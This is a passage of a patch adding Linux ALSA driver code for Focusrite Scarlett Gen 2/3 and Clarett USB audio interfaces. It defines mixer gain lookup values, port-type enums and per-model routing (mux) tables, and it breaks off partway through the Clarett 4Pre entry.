++#define SCARLETT2_MIXER_MAX_VALUE \
++	((SCARLETT2_MIXER_MAX_DB - SCARLETT2_MIXER_MIN_DB) * 2)
++#define SCARLETT2_MIXER_VALUE_COUNT (SCARLETT2_MIXER_MAX_VALUE + 1)
++
++/* map from (dB + 80) * 2 to mixer value
++ * for dB in 0 .. 172: int(8192 * pow(10, ((dB - 160) / 2 / 20)))
++ */
++static const u16 scarlett2_mixer_values[SCARLETT2_MIXER_VALUE_COUNT] = {
++	0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2,
++	2, 2, 3, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 6, 6, 6, 7, 7, 8, 8,
++	9, 9, 10, 10, 11, 12, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
++	23, 24, 25, 27, 29, 30, 32, 34, 36, 38, 41, 43, 46, 48, 51,
++	54, 57, 61, 65, 68, 73, 77, 81, 86, 91, 97, 103, 109, 115,
++	122, 129, 137, 145, 154, 163, 173, 183, 194, 205, 217, 230,
++	244, 259, 274, 290, 307, 326, 345, 365, 387, 410, 434, 460,
++	487, 516, 547, 579, 614, 650, 689, 730, 773, 819, 867, 919,
++	973, 1031, 1092, 1157, 1225, 1298, 1375, 1456, 1543, 1634,
++	1731, 1833, 1942, 2057, 2179, 2308, 2445, 2590, 2744, 2906,
++	3078, 3261, 3454, 3659, 3876, 4105, 4349, 4606, 4879, 5168,
++	5475, 5799, 6143, 6507, 6892, 7301, 7733, 8192, 8677, 9191,
++	9736, 10313, 10924, 11571, 12257, 12983, 13752, 14567, 15430,
++	16345
++};
++
++/* Maximum number of analogue outputs */
++#define SCARLETT2_ANALOGUE_MAX 10
++
++/* Maximum number of level and pad switches */
++#define SCARLETT2_LEVEL_SWITCH_MAX 2
++#define SCARLETT2_PAD_SWITCH_MAX 8
++#define SCARLETT2_AIR_SWITCH_MAX 8
++#define SCARLETT2_PHANTOM_SWITCH_MAX 2
++
++/* Maximum number of inputs to the mixer */
++#define SCARLETT2_INPUT_MIX_MAX 25
++
++/* Maximum number of outputs from the mixer */
++#define SCARLETT2_OUTPUT_MIX_MAX 12
++
++/* Maximum size of the data in the USB mux assignment message:
++ * 20 inputs, 20 outputs, 25 matrix inputs, 12 spare
++ */
++#define SCARLETT2_MUX_MAX 77
++
++/* Maximum number of meters (sum of output port counts) */
++#define SCARLETT2_MAX_METERS 65
++
++/* There are three different sets of configuration parameters across
++ * the devices
++ */
++enum {
++	SCARLETT2_CONFIG_SET_NO_MIXER = 0,
++	SCARLETT2_CONFIG_SET_GEN_2 = 1,
++	SCARLETT2_CONFIG_SET_GEN_3 = 2,
++	SCARLETT2_CONFIG_SET_CLARETT = 3,
++	SCARLETT2_CONFIG_SET_COUNT = 4
++};
++
++/* Hardware port types:
++ * - None (no input to mux)
++ * - Analogue I/O
++ * - S/PDIF I/O
++ * - ADAT I/O
++ * - Mixer I/O
++ * - PCM I/O
++ */
++enum {
++	SCARLETT2_PORT_TYPE_NONE     = 0,
++	SCARLETT2_PORT_TYPE_ANALOGUE = 1,
++	SCARLETT2_PORT_TYPE_SPDIF    = 2,
++	SCARLETT2_PORT_TYPE_ADAT     = 3,
++	SCARLETT2_PORT_TYPE_MIX      = 4,
++	SCARLETT2_PORT_TYPE_PCM      = 5,
++	SCARLETT2_PORT_TYPE_COUNT    = 6,
++};
++
++/* I/O count of each port type kept in struct scarlett2_ports */
++enum {
++	SCARLETT2_PORT_IN    = 0,
++	SCARLETT2_PORT_OUT   = 1,
++	SCARLETT2_PORT_DIRNS = 2,
++};
++
++/* Dim/Mute buttons on the 18i20 */
++enum {
++	SCARLETT2_BUTTON_MUTE    = 0,
++	SCARLETT2_BUTTON_DIM     = 1,
++	SCARLETT2_DIM_MUTE_COUNT = 2,
++};
++
++static const char *const scarlett2_dim_mute_names[SCARLETT2_DIM_MUTE_COUNT] = {
++	"Mute Playback Switch", "Dim Playback Switch"
++};
++
++/* Description of each hardware port type:
++ * - id: hardware ID of this port type
++ * - src_descr: printf format string for mux input selections
++ * - src_num_offset: added to channel number for the fprintf
++ * - dst_descr: printf format string for mixer controls
++ */
++struct scarlett2_port {
++	u16 id;
++	const char * const src_descr;
++	int src_num_offset;
++	const char * const dst_descr;
++};
++
++static const struct scarlett2_port scarlett2_ports[SCARLETT2_PORT_TYPE_COUNT] = {
++	[SCARLETT2_PORT_TYPE_NONE] = {
++		.id = 0x000,
++		.src_descr = "Off"
++	},
++	[SCARLETT2_PORT_TYPE_ANALOGUE] = {
++		.id = 0x080,
++		.src_descr = "Analogue %d",
++		.src_num_offset = 1,
++		.dst_descr = "Analogue Output %02d Playback"
++	},
++	[SCARLETT2_PORT_TYPE_SPDIF] = {
++		.id = 0x180,
++		.src_descr = "S/PDIF %d",
++		.src_num_offset = 1,
++		.dst_descr = "S/PDIF Output %d Playback"
++	},
++	[SCARLETT2_PORT_TYPE_ADAT] = {
++		.id = 0x200,
++		.src_descr = "ADAT %d",
++		.src_num_offset = 1,
++		.dst_descr = "ADAT Output %d Playback"
++	},
++	[SCARLETT2_PORT_TYPE_MIX] = {
++		.id = 0x300,
++		.src_descr = "Mix %c",
++		.src_num_offset = 'A',
++		.dst_descr = "Mixer Input %02d Capture"
++	},
++	[SCARLETT2_PORT_TYPE_PCM] = {
++		.id = 0x600,
++		.src_descr = "PCM %d",
++		.src_num_offset = 1,
++		.dst_descr = "PCM %02d Capture"
++	},
++};
++
++/* Number of mux tables: one for each band of sample rates
++ * (44.1/48kHz, 88.2/96kHz, and 176.4/176kHz)
++ */
++#define SCARLETT2_MUX_TABLES 3
++
++/* Maximum number of entries in a mux table */
++#define SCARLETT2_MAX_MUX_ENTRIES 10
++
++/* One entry within mux_assignment defines the port type and range of
++ * ports to add to the set_mux message. The end of the list is marked
++ * with count == 0.
++ */
++struct scarlett2_mux_entry {
++	u8 port_type;
++	u8 start;
++	u8 count;
++};
++
++struct scarlett2_device_info {
++	/* Gen 3 devices have an internal MSD mode switch that needs
++	 * to be disabled in order to access the full functionality of
++	 * the device.
++	 */
++	u8 has_msd_mode;
++
++	/* which set of configuration parameters the device uses */
++	u8 config_set;
++
++	/* line out hw volume is sw controlled */
++	u8 line_out_hw_vol;
++
++	/* support for main/alt speaker switching */
++	u8 has_speaker_switching;
++
++	/* support for talkback microphone */
++	u8 has_talkback;
++
++	/* the number of analogue inputs with a software switchable
++	 * level control that can be set to line or instrument
++	 */
++	u8 level_input_count;
++
++	/* the first input with a level control (0-based) */
++	u8 level_input_first;
++
++	/* the number of analogue inputs with a software switchable
++	 * 10dB pad control
++	 */
++	u8 pad_input_count;
++
++	/* the number of analogue inputs with a software switchable
++	 * "air" control
++	 */
++	u8 air_input_count;
++
++	/* the number of phantom (48V) software switchable controls */
++	u8 phantom_count;
++
++	/* the number of inputs each phantom switch controls */
++	u8 inputs_per_phantom;
++
++	/* the number of direct monitor options
++	 * (0 = none, 1 = mono only, 2 = mono/stereo)
++	 */
++	u8 direct_monitor;
++
++	/* remap analogue outputs; 18i8 Gen 3 has "line 3/4" connected
++	 * internally to the analogue 7/8 outputs
++	 */
++	u8 line_out_remap_enable;
++	u8 line_out_remap[SCARLETT2_ANALOGUE_MAX];
++
++	/* additional description for the line out volume controls */
++	const char * const line_out_descrs[SCARLETT2_ANALOGUE_MAX];
++
++	/* number of sources/destinations of each port type */
++	const int port_count[SCARLETT2_PORT_TYPE_COUNT][SCARLETT2_PORT_DIRNS];
++
++	/* layout/order of the entries in the set_mux message */
++	struct scarlett2_mux_entry mux_assignment[SCARLETT2_MUX_TABLES]
++						 [SCARLETT2_MAX_MUX_ENTRIES];
++};
++
++struct scarlett2_data {
++	struct usb_mixer_interface *mixer;
++	struct mutex usb_mutex; /* prevent sending concurrent USB requests */
++	struct mutex data_mutex; /* lock access to this data */
++	struct delayed_work work;
++	const struct scarlett2_device_info *info;
++	const char *series_name;
++	__u8 bInterfaceNumber;
++	__u8 bEndpointAddress;
++	__u16 wMaxPacketSize;
++	__u8 bInterval;
++	int num_mux_srcs;
++	int num_mux_dsts;
++	u16 scarlett2_seq;
++	u8 sync_updated;
++	u8 vol_updated;
++	u8 input_other_updated;
++	u8 monitor_other_updated;
++	u8 mux_updated;
++	u8 speaker_switching_switched;
++	u8 sync;
++	u8 master_vol;
++	u8 vol[SCARLETT2_ANALOGUE_MAX];
++	u8 vol_sw_hw_switch[SCARLETT2_ANALOGUE_MAX];
++	u8 mute_switch[SCARLETT2_ANALOGUE_MAX];
++	u8 level_switch[SCARLETT2_LEVEL_SWITCH_MAX];
++	u8 pad_switch[SCARLETT2_PAD_SWITCH_MAX];
++	u8 dim_mute[SCARLETT2_DIM_MUTE_COUNT];
++	u8 air_switch[SCARLETT2_AIR_SWITCH_MAX];
++	u8 phantom_switch[SCARLETT2_PHANTOM_SWITCH_MAX];
++	u8 phantom_persistence;
++	u8 direct_monitor_switch;
++	u8 speaker_switching_switch;
++	u8 talkback_switch;
++	u8 talkback_map[SCARLETT2_OUTPUT_MIX_MAX];
++	u8 msd_switch;
++	u8 standalone_switch;
++	struct snd_kcontrol *sync_ctl;
++	struct snd_kcontrol *master_vol_ctl;
++	struct snd_kcontrol *vol_ctls[SCARLETT2_ANALOGUE_MAX];
++	struct snd_kcontrol *sw_hw_ctls[SCARLETT2_ANALOGUE_MAX];
++	struct snd_kcontrol *mute_ctls[SCARLETT2_ANALOGUE_MAX];
++	struct snd_kcontrol *dim_mute_ctls[SCARLETT2_DIM_MUTE_COUNT];
++	struct snd_kcontrol *level_ctls[SCARLETT2_LEVEL_SWITCH_MAX];
++	struct snd_kcontrol *pad_ctls[SCARLETT2_PAD_SWITCH_MAX];
++	struct snd_kcontrol *air_ctls[SCARLETT2_AIR_SWITCH_MAX];
++	struct snd_kcontrol *phantom_ctls[SCARLETT2_PHANTOM_SWITCH_MAX];
++	struct snd_kcontrol *mux_ctls[SCARLETT2_MUX_MAX];
++	struct snd_kcontrol *direct_monitor_ctl;
++	struct snd_kcontrol *speaker_switching_ctl;
++	struct snd_kcontrol *talkback_ctl;
++	u8 mux[SCARLETT2_MUX_MAX];
++	u8 mix[SCARLETT2_INPUT_MIX_MAX * SCARLETT2_OUTPUT_MIX_MAX];
++};
++
++/*** Model-specific data ***/
++
++static const struct scarlett2_device_info s6i6_gen2_info = {
++	.config_set = SCARLETT2_CONFIG_SET_GEN_2,
++	.level_input_count = 2,
++	.pad_input_count = 2,
++
++	.line_out_descrs = {
++		"Headphones 1 L",
++		"Headphones 1 R",
++		"Headphones 2 L",
++		"Headphones 2 R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  4,  4 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
++		[SCARLETT2_PORT_TYPE_PCM]      = {  6,  6 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info s18i8_gen2_info = {
++	.config_set = SCARLETT2_CONFIG_SET_GEN_2,
++	.level_input_count = 2,
++	.pad_input_count = 4,
++
++	.line_out_descrs = {
++		"Monitor L",
++		"Monitor R",
++		"Headphones 1 L",
++		"Headphones 1 R",
++		"Headphones 2 L",
++		"Headphones 2 R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8,  6 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
++		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  0 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
++		[SCARLETT2_PORT_TYPE_PCM]      = {  8, 18 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 14 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 10 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  4 },
++		{ 0,                            0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info s18i20_gen2_info = {
++	.config_set = SCARLETT2_CONFIG_SET_GEN_2,
++	.line_out_hw_vol = 1,
++
++	.line_out_descrs = {
++		"Monitor L",
++		"Monitor R",
++		NULL,
++		NULL,
++		NULL,
++		NULL,
++		"Headphones 1 L",
++		"Headphones 1 R",
++		"Headphones 2 L",
++		"Headphones 2 R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8, 10 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
++		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  8 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
++		[SCARLETT2_PORT_TYPE_PCM]      = { 20, 18 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_ADAT,     0,  8 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 14 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_ADAT,     0,  4 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 10 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  6 },
++		{ 0,                            0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info solo_gen3_info = {
++	.has_msd_mode = 1,
++	.config_set = SCARLETT2_CONFIG_SET_NO_MIXER,
++	.level_input_count = 1,
++	.level_input_first = 1,
++	.air_input_count = 1,
++	.phantom_count = 1,
++	.inputs_per_phantom = 1,
++	.direct_monitor = 1,
++};
++
++static const struct scarlett2_device_info s2i2_gen3_info = {
++	.has_msd_mode = 1,
++	.config_set = SCARLETT2_CONFIG_SET_NO_MIXER,
++	.level_input_count = 2,
++	.air_input_count = 2,
++	.phantom_count = 1,
++	.inputs_per_phantom = 2,
++	.direct_monitor = 2,
++};
++
++static const struct scarlett2_device_info s4i4_gen3_info = {
++	.has_msd_mode = 1,
++	.config_set = SCARLETT2_CONFIG_SET_GEN_3,
++	.level_input_count = 2,
++	.pad_input_count = 2,
++	.air_input_count = 2,
++	.phantom_count = 1,
++	.inputs_per_phantom = 2,
++
++	.line_out_descrs = {
++		"Monitor L",
++		"Monitor R",
++		"Headphones L",
++		"Headphones R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = { 1, 0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = { 4, 4 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 6, 8 },
++		[SCARLETT2_PORT_TYPE_PCM]      = { 4, 6 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 16 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 16 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 16 },
++		{ 0,                            0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info s8i6_gen3_info = {
++	.has_msd_mode = 1,
++	.config_set = SCARLETT2_CONFIG_SET_GEN_3,
++	.level_input_count = 2,
++	.pad_input_count = 2,
++	.air_input_count = 2,
++	.phantom_count = 1,
++	.inputs_per_phantom = 2,
++
++	.line_out_descrs = {
++		"Headphones 1 L",
++		"Headphones 1 R",
++		"Headphones 2 L",
++		"Headphones 2 R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = { 1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = { 6,  4 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = { 2,  2 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 8,  8 },
++		[SCARLETT2_PORT_TYPE_PCM]      = { 6, 10 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_PCM,      8,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 18 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_PCM,      8,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 18 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_PCM,      8,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 18 },
++		{ 0,                            0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info s18i8_gen3_info = {
++	.has_msd_mode = 1,
++	.config_set = SCARLETT2_CONFIG_SET_GEN_3,
++	.line_out_hw_vol = 1,
++	.has_speaker_switching = 1,
++	.level_input_count = 2,
++	.pad_input_count = 4,
++	.air_input_count = 4,
++	.phantom_count = 2,
++	.inputs_per_phantom = 2,
++
++	.line_out_remap_enable = 1,
++	.line_out_remap = { 0, 1, 6, 7, 2, 3, 4, 5 },
++
++	.line_out_descrs = {
++		"Monitor L",
++		"Monitor R",
++		"Alt Monitor L",
++		"Alt Monitor R",
++		"Headphones 1 L",
++		"Headphones 1 R",
++		"Headphones 2 L",
++		"Headphones 2 R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8,  8 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
++		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  0 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 20 },
++		[SCARLETT2_PORT_TYPE_PCM]      = {  8, 20 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,       0, 10 },
++		{ SCARLETT2_PORT_TYPE_PCM,      12,  8 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0,  2 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  6,  2 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  2,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
++		{ SCARLETT2_PORT_TYPE_PCM,      10,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,       0, 20 },
++		{ SCARLETT2_PORT_TYPE_NONE,      0, 10 },
++		{ 0,                             0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,       0, 10 },
++		{ SCARLETT2_PORT_TYPE_PCM,      12,  4 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0,  2 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  6,  2 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  2,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
++		{ SCARLETT2_PORT_TYPE_PCM,      10,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,       0, 20 },
++		{ SCARLETT2_PORT_TYPE_NONE,      0, 10 },
++		{ 0,                             0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,       0, 10 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0,  2 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  6,  2 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  2,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,       0, 20 },
++		{ SCARLETT2_PORT_TYPE_NONE,      0, 10 },
++		{ 0,                             0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info s18i20_gen3_info = {
++	.has_msd_mode = 1,
++	.config_set = SCARLETT2_CONFIG_SET_GEN_3,
++	.line_out_hw_vol = 1,
++	.has_speaker_switching = 1,
++	.has_talkback = 1,
++	.level_input_count = 2,
++	.pad_input_count = 8,
++	.air_input_count = 8,
++	.phantom_count = 2,
++	.inputs_per_phantom = 4,
++
++	.line_out_descrs = {
++		"Monitor 1 L",
++		"Monitor 1 R",
++		"Monitor 2 L",
++		"Monitor 2 R",
++		NULL,
++		NULL,
++		"Headphones 1 L",
++		"Headphones 1 R",
++		"Headphones 2 L",
++		"Headphones 2 R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  9, 10 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
++		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  8 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 12, 25 },
++		[SCARLETT2_PORT_TYPE_PCM]      = { 20, 20 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,       0,  8 },
++		{ SCARLETT2_PORT_TYPE_PCM,      10, 10 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
++		{ SCARLETT2_PORT_TYPE_ADAT,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_PCM,       8,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,       0, 25 },
++		{ SCARLETT2_PORT_TYPE_NONE,      0, 12 },
++		{ 0,                             0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,       0,  8 },
++		{ SCARLETT2_PORT_TYPE_PCM,      10,  8 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
++		{ SCARLETT2_PORT_TYPE_ADAT,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_PCM,       8,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,       0, 25 },
++		{ SCARLETT2_PORT_TYPE_NONE,      0, 10 },
++		{ 0,                             0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,       0, 10 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
++		{ SCARLETT2_PORT_TYPE_NONE,      0, 24 },
++		{ 0,                             0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info clarett_2pre_info = {
++	.config_set = SCARLETT2_CONFIG_SET_CLARETT,
++	.line_out_hw_vol = 1,
++	.level_input_count = 2,
++	.air_input_count = 2,
++
++	.line_out_descrs = {
++		"Monitor L",
++		"Monitor R",
++		"Headphones L",
++		"Headphones R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  2,  4 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  0 },
++		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  0 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
++		[SCARLETT2_PORT_TYPE_PCM]      = {  4, 12 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 12 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  2 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 26 },
++		{ 0,                            0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info clarett_4pre_info = {
++	.config_set = SCARLETT2_CONFIG_SET_CLARETT,
++	.line_out_hw_vol = 1,
++	.level_input_count = 2,
++	.air_input_count = 4,
++
++	.line_out_descrs = {
++		"Monitor L",
++		"Monitor R",
++		"Headphones 1 L",
++		"Headphones 1 R",
++		"Headphones 2 L",
++		"Headphones 2 R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8,  6 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
++		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  0 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
++		[SCARLETT2_PORT_TYPE_PCM]      = {  8, 18 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 14 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
